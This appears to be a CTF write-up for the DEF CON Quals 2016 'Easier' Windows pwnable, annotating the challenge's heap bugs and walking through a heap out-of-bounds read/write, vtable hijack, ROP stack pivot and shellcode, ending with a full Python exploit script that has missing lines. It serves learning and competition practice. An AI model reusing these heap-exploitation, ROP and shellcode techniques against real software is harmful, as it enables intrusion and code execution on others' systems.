# Def Con Quals 2016 – Easier [Pwnable]

Easier has the dubious honor of being the most frustrating CTF challenge I have completed to date. It was the second hardest challenge in the CTF, according to the dynamic scoring system LegitBS used. (And the hardest problem that my team, 9447, solved.)

The challenge presented a fairly opaque interface, sending the user four random numbers on start up, and accepting four numbers in return. I reversed this pretty extensively in IDA and WinDbg, figuring out that it was performing modular exponentiation and finding all the parameters, only to figure out that the result is completely ignored as long as all your response values are greater than 1 (otherwise it exits).

So, a lot of time wasted, but now we get to it reading more input. It would read two numbers from the user perform a cryptographic-looking operation on them. I reversed this to the following C code:

```    void do_input(unsigned *buffer, unsigned count) {
for (unsigned i = 0; i < count; i++) {
scanf("%ux",&buf[i]);
}
unsigned lookup[4] = {1, 2, 3, 4};
for (unsigned i = 0; i < count; i += 2) {
unsigned value = 0x7CBF26C0;
unsigned v1 = buffer[i];
unsigned v2 = buffer[i+1];
for (unsigned j = 0; j < 64; j++) {
v2 -= (value + lookup[(value >> 11) & 3]) ^
(v1 + ((v1 << 4) ^ (v1 >> 5)));
value += 0x160D0365;
v1 -= (value + lookup[value         & 3]) ^
(v2 + ((v2 << 4) ^ (v2 >> 5)));
}
buffer[i] = v1;
buffer[i+1] = v2;
}
}
```

I tried to transcribe this to z3 to find the inverse, painstakingly debugged an issue where using v2>>5 instead of LShR(v2,5) caused z3 to hang indefinitely, and I could finally send commands! My first successful use of z3 in a CTF!

As soon as I started reversing the commands, however, I immediately found that command number 2 called a function that performed the inverse operation all along. I transcribed that C code to Python, hung my head in shame, and moved on with the challenge.

To explain the commands, I will annotate the source LegitBS kindly release on GitHub (DefconChal2.cpp, I will however note that lines 91 to 93 are definitely not in the binary (and might have made things a lot easier).

In the end I used commands 1, 2, and 5 to write the exploit. But the seemingly endless collection of useless or painfully hard to use bugs is worth noting (starting with the “does-nothing” crypto initialization).

```  // allocates room for 128 buffers, even though bufferPointer is
// limited to 63 (this makes a reference to bufferPointer*2 in
// command 8 safe, though)
uint32_t **buffers = (uint32_t **)halloc(512);
uint32_t bufferPointer = 0;
while (1) {
uint32_t buf[2] = {0};
int newSize;
newSize = buf[1];
uint32_t *toUse;
if (bufferPointer > 63) {
exit(-1);
}
switch (buf[0]) {
case 1:
// newSize is signed, so we could allocate -4 if we wanted,
// or smaller numbers to get a possibly-interesting NULL
// pointer dereference. Of course, this would "scanf" pretty
// much indefinitely.
if (newSize < 2048) {
toUse = (uint32_t *)halloc(newSize + 4);
} else {
exit(-1);
}
toUse[0] = buf[1];
buffers[bufferPointer++] = toUse;
break;
case 2:
// Send back the buffer
if (buf[1] < 64 && buffers[buf[1]] != 0) {
writen(&(buffers[buf[1]][1]), buffers[buf[1]][0] / 4, agreeKey);
}
break;
case 3:
// Free a buffer
if (buf[1] < 64 && buffers[buf[1]] != 0) {
hfree(buffers[buf[1]]);
buffers[buf[1]] = 0;
} else {
exit(-1);
}
break;
case 4: {
// This looks like it leaks the address of ntdll, but "hm += 4" adds
// 4 * sizeof (HMODULE*) = 16 bytes, so it corrupts the heap. It
// also doesn't store the new allocation in the "buffers" array, so
// it's useless.
HMODULE *hm = (HMODULE *)halloc(sizeof(HMODULE) + 4);
*(uint32_t *)hm = (uint32_t)sizeof(HMODULE);
hm += 4;
} break;
case 5: {
// This is the only crazy one I could use. "b1" can be buffer 0 (the
// first buffer allocated), or buffer 64 (see command 8?)
int b1 = buf[1] & 64;
int b2 = (buf[1] >> 8) & 63; // any buffer 0 through 63
if (buffers[b1] == NULL || buffers[b2] == NULL) {
exit(-1);
}

// copy using the length from b1
memcpy(&buffers[b1][1], &buffers[b2][1], buffers[b1][0]);

// Set the length of b1 to the length of b2, potentially growing the
// buffer. This has a lot of advantages.
buffers[b1][0] = buffers[b2][0];

// Free the second buffer without removing it from the list (so you
// could double-free it, use the free list pointers as buffer length,
// etc.)
hfree(buffers[b2]);
break;
}
case 6:
{
// This looks like a nice arbitrary read, because it doesn't check
// the bounds of "buffers". Except there's no way to get the
// result - it just leaves it on the stack. And it calls
// "readn(..., 1, ...)" which uses the uninitialized memory in
// offset[1] which makes the chosen index basically random.
uint32_t offset[2];
uint32_t *myBuf = buffers[buf[1]];
char toEnc[8] = {0};
if (offset[0] < myBuf[0] / 4) {
sprintf(toEnc, "%08x\n", myBuf[offset[0] + 1]);
}

} break;
case 7: {
// This looks like a nice arbitrary write, but again, it uses
// readn(..., 1, ...), twice. Maybe z3 could have solved the second
// one, but the local values seemed to contain random stack
// addresses when I tried it.
uint32_t offset[2];
uint32_t *myBuf = buffers[buf[1]];
if (offset[0] < myBuf[0] / 4) {
}
} break;
case 8: {
// This makes the same mistake as case 4 of adding
// 4*sizeof(SYSTEM_INFO) and even worse, stores the wrong pointer
// into the buffers array (where it could be freed - the bugs are
// endless). It also uses bufferPointer*2 as the index, which is
// interesting because it's the only way we could write to
// buffers[64] (which we can access in command 5). (As noted above,
// the array is big enough that this isn't out-of-bounds.)
uint32_t *val;
LPSYSTEM_INFO lpinfo = (LPSYSTEM_INFO)halloc(sizeof(SYSTEM_INFO)+4);
val = (uint32_t *)lpinfo;
lpinfo += 4;
val[0] = sizeof(SYSTEM_INFO);
GetSystemInfo(lpinfo);
buffers[bufferPointer * 2] = (uint32_t *)lpinfo;
bufferPointer++;
} break;
default:
exit(-1);
break;
}
}```

Okay, so I trust you read cases 1, 2, and 5. The first trick I found was to leak a lot of heap memory. This works (at a guess) by using the free list pointer to read out of bounds:

```send_pair(1, 3)  # allocate a buffer with zero items
send_pair(6, 0)  # free the buffer, without removing it from the list
send_pair(2, 0)  # read the buffer```

(At this point it’s worth noting another bug: in the “read the buffer” command, the first two DWORDs are encoded, and every subsequent DWORD is transmitted as it. Useless, but confusing.)

This would dump a large amount of heap memory, then crash. I used WinDbg’s !heap command to try to understand, and I think this is because the allocation landed in an LFH region in the heap somewhere early on. It was useful because this leaked out some recognisable pointers into the binary, making it possible to figure out the remote ASLR slide. (It’s worth mentioning that Windows pretty much only randomizes module addresses once per boot, so the location of the binary was the same every time I connected to the same server).

The bug I planned to exploit was in command 5, which can grow the buffer. This gives you an arbitrary out-of-bounds heap read and write:

```send_pair(1, 3)            # allocate a buffer with zero items
send_pair(1, 2040)         # allocate a buffer with 2040 items
send_sequence([0] * 2040)
send_pair(6, 1 << 8)       # set the length of the first buffer to 2040
send_pair(2, 0)            # read the buffer
send_pair(1, 2040)         # allocate a new buffer with 2040 items
send_sequence([0x41414141] * 2040)
send_pair(6, 2 << 8)       # copy the data to the buffer this time
```

Now, my master plan was to allocate the first buffer immediately before “buffers” array on the heap and control it. I had an EC2 instance set up to try to replicate the conditions and I tried a few different allocation sizes and eventually got this working. Nice!

Fortunately, I had to foresight to try to reproduce this result on the remote server. It didn’t work. I still don’t know why.

However, I did notice a new pointer into the binary that I hadn’t seen before when I used an allocation size of 24. This was a pointer to a vtable, which IDA recognised as that of “std::locale::_Locimp”, some part of the statically linked C++ runtime code. Unfortunately, I couldn’t see this locally, but as it was my only lead, I decided to try exploiting it remotely, with no way to debug it.

But how could I make a fake vtable? I needed to figure out the address of my data on the heap. Item zero gave a read-write size of 2040, but if I allocated another buffer after it (in the randomized LFH), I could modify its length to be an arbitrary value, leaking enough of the heap to reveal the buffers array. From here, I could find one of my buffers that contained a vtable. I filled a buffer with the pointer to the following gadget:

``` .text:00401850 push offset a08x08x08x08x ; "%08x %08x %08x %08x\n"
.text:00401855 call printf```

And then changed the vtable pointer to point to it. Nothing happened. Then I sent an invalid free command and suddenly it printed the four hex values! The first one printed was the return address, which I figured out was inside an _atexit handler. I had eip control!

From here, painstaking step by painstaking step I wrote my ROP chain without a debugger. One interesting note is the pivot I used:

` les esp, ptr [eax] ; pop esi ; pop ebp ; ret`

Not being familiar with the les instruction(“Load Far Pointer”) I had assumed it loaded a pointer from the es segment. This was a mistake (and a very tricky mistake to debug blindly). It turns out it loads a 48-bit pointer from memory, with the high 16 bits going into the es segment register. I found the value of es on my Windows test server, and corrected my fake vtable to be:

``` vtable = [
0x2B,              # value for the "es" segment
slide(0x00405b04), # les esp, ptr [eax] ; pop esi ; pop ebp ; ret
]```

From here, I used my ROP chain to call the “writen” function and dump out the address of functions in kernel32 (from easier’s imports). I then called VirtualAlloc to protect some shellcode and returned into it.

Victory, right?

Nope, just to add to the frustration, I couldn’t manage to open the flag file. I tried using WinExec to run commands (I don’t think I got any output). I tried using CreateFileA, and debugged it using GetLastError and printf (I was initially passing the wrong arguments). I eventually called GetProcAddress(LoadLibraryA(“msvcrt”), “system”) and managed to run commands. echo hello worked, but dir and type flag.txt both output Access denied. I ran GetCurrentDirectoryA(…) and printed the result, and eventually figured out the winning command to pass to system:

`type "C:\Users\Administrator\Desktop\Defcon Chal\key.txt"`

Was this necessary? In hindsight I imagine not, but it was what finally worked.

Many thanks to LegitBS for the most incredibly frustrating challenge I have ever done. I hate thing2 too 🙂

The slightly-cleaned-up code is below. Note that it contains a few hardcoded addresses, which were found using different ROP chains or shellcodes.

```import socket
import struct
import random
import string
import time
import sys

shellcode = '648b250400000081ec00020000e83a000000747970652022433a5c55736572735c41646d696e6973747261746f725c4465736b746f705c446566636f6e204368616c5c6b65792e7478742200be30b71b75ffd6be5018eb00ffe6'.decode('hex')

# align to 8 bytes
while len(shellcode) % 8: shellcode += '\0'
shellcode_dwords = [struct.unpack_from('I', shellcode, i)[0] for i in range(0, len(shellcode), 4)]

# usual boilerplate

VERBOSE = False
sock = None
buf = sock.recv(1)
if not buf:
raise EOFError
return buf

s = ''.join(read_byte() for i in range(n))
if VERBOSE:
print '<', `s`
return s

s = ''
while not s.endswith(sentinel):
if VERBOSE:
sys.stdout.write(b)
sys.stdout.flush()
s += b
return s

def send(s):
if VERBOSE:
print '>', `s`
sock.sendall(s)

# specific code
U32 = 0xFFFFFFFF
def encode(v1, v2):
value = 0
lookup = [1,2,3,4]
for i in range(64):
v1 = (v1 + ((value + lookup[value & 3]) ^ (v2 + ((v2 << 4) ^ (v2 >> 5))))) & U32
value -= 0x160D0365;
v2 = (v2 + ((value + lookup[(value >> 11) & 3]) ^ (v1 + ((v1 << 4) ^ (v1 >> 5))))) & U32
return v1, v2

def decode(v1, v2):
value = 0x7CBF26C0
lookup = [1,2,3,4]
for i in range(64):
v2 = (v2 - ((value + lookup[(value >> 11) & 3]) ^ (v1 + ((v1 << 4) ^ (v1 >> 5))))) & U32
value += 0x160D0365
v1 = (v1 - ((value + lookup[value         & 3]) ^ (v2 + ((v2 << 4) ^ (v2 >> 5))))) & U32
return v1, v2

def send_pair(v1, v2):
v1, v2 = encode(v1, v2)
send(str(v1) + 'x ' + str(v2) + 'x\n')

def send_sequence(l):
l = l[:]
n = len(l) & 1
if n:
l.append(0)
for i in range(0, len(l), 2):
l[i], l[i+1] = encode(l[i], l[i+1])
if n:
l = l[:-1]
send(' '.join('%dx' % i for i in l) + '\n')

def allocate_item(size, data):
send_pair(1, size)
send_sequence(data)

send_pair(2, item)
r = [int(i,16) for i in read_until('\n').split()]
if len(r) >= 2:
r[0], r[1] = decode(r[0], r[1])
return r

def free_item(item):
send_pair(3, item)

def operation_5(zero_or_40, src_idx):
send_pair(5, zero_or_40 | (src_idx << 8))

def try_to_win():
global VERBOSE
global sock

# do the pointless handshake
send('4 5 6 7\n')

# this size allocates in an LHF block preceeding the vtable on the remote
# server
size = 24
current_item = 0
allocate_item(size, [2] * (size/4)); current_item += 1

# allocate the largest item we can
grow_item = current_item
allocate_item(2040, [2] * (2040/4)); current_item += 1

# allocate more items in the same LFH block, so we can grow one of them
# to leak even more heap memory
for i in range(19):
allocate_item(24, [0x12345678,current_item,0,0,0,0]); current_item += 1

# copy 24 bytes to our first allocation, and set its size to 2040
operation_5(0, grow_item)

# read out the 2040 bytes

# try to find the vtable
vtable_index = None

for i, v in enumerate(original):
if (v & 0xFFFF) == 0xc134:
image_base = v - 0x1c134
print hex(image_base)
vtable_index = i
print 'found vtable at offset', i
break
else:
# just retry
print 'no vtable! :('
return False

# try to find one of our other buffers
for i, v in enumerate(original):
if i + 1 < len(original) and v == 0x12345678:
leak_item_index = i-1
leak_item_id = original[i+1]
print 'found item', original[i+1], 'at index', leak_item_index
break
else:
print 'no item'
return False

# grow our leak item so we can read 9KB of heap memory
update = original[:]
update[leak_item_index] = 0x2400

# we write to our 2040 byte window by allocating a new item
# and doing operation 5 again. this copies 2040 bytes.
update_item = current_item
allocate_item(2040, update); current_item += 1

operation_5(0, update_item)

# leak 9KB of memory for the first time.
# this should include the array of pointers to our buffers, which will
# allow us to find the address of our buffers and construct complex data.
print ' '.join('%x' % i for i in leak_1)

# allocate the shellcode
allocate_item(len(shellcode_dwords)*4, shellcode_dwords); current_item += 1

# find the pointer to the shellcode by leaking 9KB again, and looking at
# the changes made to the memory

for i, (a,b) in enumerate(zip(leak_1, leak_2)):
if i == 0 or i == len(leak_1) - 1: continue
if leak_1[i-1] != 0 and leak_2[i-1] != 0 and a == 0 and b != 0 and leak_1[i+1] == 0 and leak_2[i+1] == 0:
print 'index is', hex(i)
break
else:
return False

# generate our rop chain, using the shellcode address

def slide(x):
return x - 0x400000 + image_base

definitely_printf_4 = slide( 0x401850 )

# (unused) function for dumping memory
# I used this, combined with some "pop" gadgets to dump the import
# pointers and find the kernel32 base address.
write_function = slide( 0x40F13A )

# just a ret instruction
rop_nop = slide( 0x40F21B )

# This could be calculated at the time, but once-per-boot ASLR is too
# convenient not to take advantage of.
kernel32_base = 0x770e0000

virutalalloc = 0x6B818B90-0x6B810000+kernel32_base

rop_chain = [
# make some room for the stack, so it won't corrupt the heap
rop_nop, # esi
rop_nop, # ebp
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
rop_nop,
virutalalloc,
len(shellcode),
0x1000,
0x40,
]

# allocate the rop chain
while len(rop_chain) < (0x100/4):
rop_chain.append(rop_nop)
assert len(rop_chain) == (0x100/4)

allocate_item(0x100, rop_chain); current_item += 1

# find the rop chain as before

for i, (a,b) in enumerate(zip(leak_2, leak_3)):
if i == 0 or i == len(leak_2) - 1: continue
if leak_2[i-1] != 0 and leak_3[i-1] != 0 and a == 0 and b != 0 and leak_2[i+1] == 0 and leak_3[i+1] == 0:
print 'index is', hex(i)
my_rop_chain = leak_3[i] + 4
print 'my_rop_chain @ ' + hex(my_rop_chain)
break
else:
print 'couldnt find my_rop_chain'
return False

# create the vtable, using the pointer to the rop chain
vtable = [
my_rop_chain,
0x2B,               # value for the "es" segment
slide(0x00405b04),  # les esp, ptr [eax] ; pop esi ; pop ebp ; ret
]

while len(vtable) < (0x40/4):
vtable.append(0)
assert len(vtable) == (0x40/4)

# allocate the vtable
allocate_item(0x40, vtable); current_item += 1

# find the vtable as before

for i, (a,b) in enumerate(zip(leak_3, leak_4)):
if i == 0 or i == len(leak_3) - 1: continue
if leak_3[i-1] != 0 and leak_4[i-1] != 0 and a == 0 and b != 0 and leak_3[i+1] == 0 and leak_4[i+1] == 0:
my_vtable = leak_4[i] + 4
print 'my_vtable @ ' + hex(my_vtable)
break
else:
print 'couldnt find my_vtable'
return False

# now we can just corrupt the existing vtable to point to our fake one
VERBOSE = True
update[vtable_index] = my_vtable
update_item = current_item
allocate_item(2040, update); current_item += 1

operation_5(0, update_item)

# invoke exit, to trigger the atexit handler to trigger the virtual call
free_item(100)

# read forever, dumping output to stderr (hangs)